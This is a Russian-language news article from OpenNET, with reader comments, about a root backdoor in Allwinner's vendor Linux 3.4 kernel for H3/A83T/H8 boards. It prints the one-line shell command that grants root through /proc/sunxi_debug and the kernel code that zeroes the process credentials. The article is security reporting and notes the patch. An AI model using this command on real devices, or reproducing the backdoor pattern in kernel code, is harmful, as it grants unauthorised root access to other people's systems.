The OpenNET Project / Index page

[ новости/++ | форум | wiki | теги ]

10.05.2016 11:48  Бэкдор в отладочном коде модифицированного ядра Linux для систем Allwinner

Разработчики Linux-дистрибутива Armbian обратили внимание на бэкдор, присутствующий в варианте ядра Linux, предлагаемом для устройств на базе процессоров Allwinner семейства sun8i (H3, A83T и H8). Бэкдор позволяет получить привилегии root через запись строки "rootmydevice" в файл "/proc/sunxi_debug/sunxi_debug".


   $ id
   uid=1000(user) gid=1000(user) 

   $ echo "rootmydevice" > /proc/sunxi_debug/sunxi_debug 

   $ id
   uid=0(root) gid=0(root) 

Проблеме подвержены дистрибутивы и прошивки, использующие предлагаемое компанией Allwinner ядро Linux 3.4, поставляемое в составе официального BSP для Android. Например, бэкдор присутствует во всех основанных на ядре 3.4 системных образах для плат с процессорами Allwinner H3, A83T и H8, включая Orange Pi, FriendlyARM, SinoVoip M2+ и M3 Banana Pi, Cubietruck и LinkSprite pcDuino8 Uno.

Для предоставления прав root в обработчике sunxi_proc_su_write используется следующий код, выставляющий привилегии root текущему процессу:


        if(!strncmp("rootmydevice",(char*)buf,12)){
		cred = (struct cred *)__task_cred(current);
		cred->uid = 0;
		cred->gid = 0;
		cred->suid = 0;
		cred->euid = 0;
		cred->euid = 0;
		cred->egid = 0;
		cred->fsuid = 0;
		cred->fsgid = 0;
		printk("now you are root\n");
	}

Бэкдор позиционируется как отладочный режим, упрощающий получение прав root на портативных устройствах на базе платформы Android. В настоящее время уже подготовлен патч, переводящий бэкдор в форму отключенной по умолчанию опции. Проблема уже устранена в выпуске дистрибутива Armbian 5.10.

  1. Главная ссылка к новости (http://www.theregister.co.uk/2...)
  2. OpenNews: Определён универсальный пароль для входа на межсетевые экраны Juniper ScreenOS
  3. OpenNews: Концепция stateless-ноутбука, защищённого от аппаратных бэкдоров
  4. OpenNews: Взлом инфраструктуры Linux Mint привёл к распространению ISO-образов с бэкдором
  5. OpenNews: В socat выявлен потенциальный бэкдор, позволяющий воссоздать ключи шифрования
  6. OpenNews: В межсетевых экранах FortiGate выявлен бэкдор
Лицензия: CC-BY
Тип: Проблемы безопасности
Ключевые слова: backdoor, allwinner
При перепечатке указание ссылки на opennet.ru обязательно
Обсуждение Линейный вид | Ajax | Показать все | RSS
 
  • 1.1, Аноним, 13:04, 10/05/2016 [ответить] [смотреть все]
  • +25 +/
    отладочный режим для АНБ ФСБ КГБ
     
     
  • 2.2, Аноним, 13:11, 10/05/2016 [^] [ответить] [смотреть все] [показать ветку]
  • +/
    короче для всех кроме нас)
     
     
  • 3.17, Аноним, 15:26, 10/05/2016 [^] [ответить] [смотреть все]
  • +2 +/
    А вы, надо полагать, ЦРУ?
     
     
  • 4.21, Аноним, 16:17, 10/05/2016 [^] [ответить] [смотреть все]
  • +12 +/
    Нет, ми моссад.
     
     
  • 5.46, Fantomas, 04:46, 11/05/2016 [^] [ответить] [смотреть все]
  • +1 +/
    Московский сад что ли?
     
     
  • 6.47, t28, 09:22, 11/05/2016 [^] [ответить] [смотреть все]  
  • +/
    Да.
     
  • 3.41, Аноним, 23:23, 10/05/2016 [^] [ответить] [смотреть все]  
  • +/
    >  короче для всех кроме нас)

    А у тебя что, echo не работает?

     
  • 2.19, Аноним, 15:51, 10/05/2016 [^] [ответить] [смотреть все] [показать ветку]  
  • +1 +/
    ru wikipedia org Совет по национальной безопасности United States National Secu... весь текст скрыт [показать] [показать ветку]
     
  • 2.26, Аноним, 17:45, 10/05/2016 [^] [ответить] [смотреть все] [показать ветку]  
  • +4 +/
    Очень полезная функция на андроиде Или получение рута через недокументированные... весь текст скрыт [показать] [показать ветку]
     
     
  • 3.34, Eklykti, 19:37, 10/05/2016 [^] [ответить] [смотреть все]  
  • +1 +/
    Угу, только ты ставишь 171 калькулятор 187 из маркета, а он получает таким о... весь текст скрыт [показать]
     
     
  • 4.35, Crazy Alex, 20:20, 10/05/2016 [^] [ответить] [смотреть все]  
  • +1 +/
    Если ты хочешь безопасность на андроиде - какой, к лешему, маркет Опять же - в ... весь текст скрыт [показать]
     
     
  • 5.36, РОСКОМУЗОР, 21:10, 10/05/2016 [^] [ответить] [смотреть все]  
  • +1 +/
    Если ты хочешь безопасность, какой к лешему андроид?
     
     
  • 6.37, God, 21:38, 10/05/2016 [^] [ответить] [смотреть все]  
  • +3 +/
    Если ты хочешь, то какая к лешему безопасность?
     
  • 6.38, Crazy Alex, 21:48, 10/05/2016 [^] [ответить] [смотреть все]  
  • +/
    Самый обычный Если не надо прятаться от спецслужб и прочих врагов, а всего лишь... весь текст скрыт [показать]
     
  • 2.39, vitalif, 21:49, 10/05/2016 [^] [ответить] [смотреть все] [показать ветку]  
  • +/
    Не, на андроиде маст хэв!
     
  • 1.6, Аноним, 13:42, 10/05/2016 [ответить] [смотреть все]  
  • +5 +/
    Это не баг, это фича!
     
  • 1.8, бедный буратино, 14:01, 10/05/2016 [ответить] [смотреть все]  
  • –1 +/
    пойду свой armbian проверю
     
     
  • 2.42, Аноним, 23:25, 10/05/2016 [^] [ответить] [смотреть все] [показать ветку]  
  • –1 +/
    Не надо всякие бэкдорианы ставить и вендорские ядра Только майнлайн, только деб... весь текст скрыт [показать] [показать ветку]
     
  • 1.11, Аноним as anon, 14:35, 10/05/2016 [ответить] [смотреть все]  
  • –3 +/
    К андроиду данная новость не имеет никакого отношения Если ни разу не видели чт... весь текст скрыт [показать]
     
     
  • 2.14, p5n, 14:51, 10/05/2016 [^] [ответить] [смотреть все] [показать ветку]  
  • +3 +/
    Например cubieboard идёт с прошитым андроидом И есть планшеты на allwinner есте... весь текст скрыт [показать] [показать ветку]
     
     
  • 3.27, Аноним, 17:47, 10/05/2016 [^] [ответить] [смотреть все]  
  • +1 +/
    Только надо пароль рута потом сразу создавать, т е это должно сразу предлагаться... весь текст скрыт [показать]
     
  • 3.43, Аноним, 23:26, 10/05/2016 [^] [ответить] [смотреть все]  
  • +/
    У SD-карты приоритет А у некоторых allwinner вообще только загрузка с карты и е... весь текст скрыт [показать]
     
  • 1.13, Аноним, 14:48, 10/05/2016 [ответить] [смотреть все]  
  • +/
    Может стоит написать в новости кто же этот герой, добавивший бэкдор?
     
     
  • 2.15, p5n, 14:52, 10/05/2016 [^] [ответить] [смотреть все] [показать ветку]  
  • +1 +/
    Врядли компания Allwinner это расскажет Речь о их форке ядра ... весь текст скрыт [показать] [показать ветку]
     
  • 1.23, Аноним, 16:54, 10/05/2016 [ответить] [смотреть все]  
  • +/
    echo rootmydevice proc sunxi_debug sunxi_debug -bash proc sunxi_debug s... весь текст скрыт [показать]
     
     
  • 2.24, Аноним, 16:56, 10/05/2016 [^] [ответить] [смотреть все] [показать ветку]  
  • +/
    а, там только для арм8. посыпаю голову пеплом :}
     
     
  • 3.28, anonymous, 18:25, 10/05/2016 [^] [ответить] [смотреть все]  
  • +/
    sun8i - это armv7 orangepi OrangePI uname -a Linux OrangePI 3 4 39 2 SMP PRE... весь текст скрыт [показать]
     
  • 1.25, Аноним, 17:06, 10/05/2016 [ответить] [смотреть все]  
  • –3 +/
    тот самый случай, когда proc не в прок
     
     
  • 2.44, Аноним, 23:28, 10/05/2016 [^] [ответить] [смотреть все] [показать ветку]  
  • –1 +/
    Отключи Только как ты потом будешь смотреть что у тебя вообще запущено в систем... весь текст скрыт [показать] [показать ветку]
     
     
  • 3.54, Аноним, 23:38, 11/05/2016 [^] [ответить] [смотреть все]  
  • +/
    Ныхрены это смотреть на _отлаженной_ системе ... весь текст скрыт [показать]
     
  • 1.29, anonimus, 18:27, 10/05/2016 [ответить] [смотреть все]  
  • +4 +/
    Строка 'cred->euid = 0;' написана 2 раза

    Надо челу, рекламирующиему статический анализатор с блюющим единорогом, проверить алвинеровские бекдоры и запилить статью на хабр с объяснениями как испраить баги и ссылкой на англоязычный перевод.

     
     
  • 2.30, тоже Аноним, 18:35, 10/05/2016 [^] [ответить] [смотреть все] [показать ветку]  
  • +1 +/
    Если их статический анализатор начнет еще и бэкдоры выявлять, имиджевому единоро... весь текст скрыт [показать] [показать ветку]
     
     
  • 3.32, anonimus, 18:44, 10/05/2016 [^] [ответить] [смотреть все]  
  • +/
    Не выявлять бекдоры, а хотя бы писать их так, чтобы они во время своей паразитно... весь текст скрыт [показать]
     
  • 2.31, anonimus, 18:38, 10/05/2016 [^] [ответить] [смотреть все] [показать ветку]  
  • –1 +/
    да и код сравнения строк с strncmp написан неаккуратненько Надо бы сначала убед... весь текст скрыт [показать] [показать ветку]
     
     
  • 3.33, Аноним, 19:25, 10/05/2016 [^] [ответить] [смотреть все]  
  • +3 +/
    А смысл? Вернет значение больше нуля да и ладно
     
  • 3.51, alex, 17:37, 11/05/2016 [^] [ответить] [смотреть все]  
  • +/
    count - это типа сначала длину строки в буфере проверить дак сравнение точно та... весь текст скрыт [показать]
     
  • 1.40, chinarulezzz, 22:27, 10/05/2016 [ответить] [смотреть все]  
  • +/
    > предлагаемое компанией Allwinner

    к перцам нужно внимательней относиться)

     
     
  • 2.45, Аноним, 23:57, 10/05/2016 [^] [ответить] [смотреть все] [показать ветку]  
  • +/
    У них там все драйверы такие Где дебаг, где просто баг Пользуйтесь майнлайном ... весь текст скрыт [показать] [показать ветку]
     
  • 1.48, IZh., 11:56, 11/05/2016 [ответить] [смотреть все]  
  • +/
    > cred->uid = 0;
    > ...

    А RCU для кого писано?
    Вот тут точно статические анализаторы могли бы warning выдавать.

     
  • 1.52, Аноним, 17:50, 11/05/2016 [ответить] [смотреть все]  
  • +/
    Э Бэкдор позиционируется как отладочный ре типа уже позиционируется малварь ле... весь текст скрыт [показать]
     
  • 1.53, Аноним, 17:53, 11/05/2016 [ответить] [смотреть все]  
  • –1 +/
    такая спокойная беседа о бэкдоре
     
     
  • 2.55, Аноним, 23:39, 11/05/2016 [^] [ответить] [смотреть все] [показать ветку]  
  • +/
    Так они повсюду Чтобы не понтоваться - надо выкинуть девайся и к староверам, в ... весь текст скрыт [показать] [показать ветку]
     

     Добавить комментарий
    Имя:
    E-Mail:
    Заголовок:
    Текст:


      Закладки на сайте
      Проследить за страницей
    Created 1996-2018 by Maxim Chirkov  
    ДобавитьРекламаВебмастеруГИД  
    Hosting by Ihor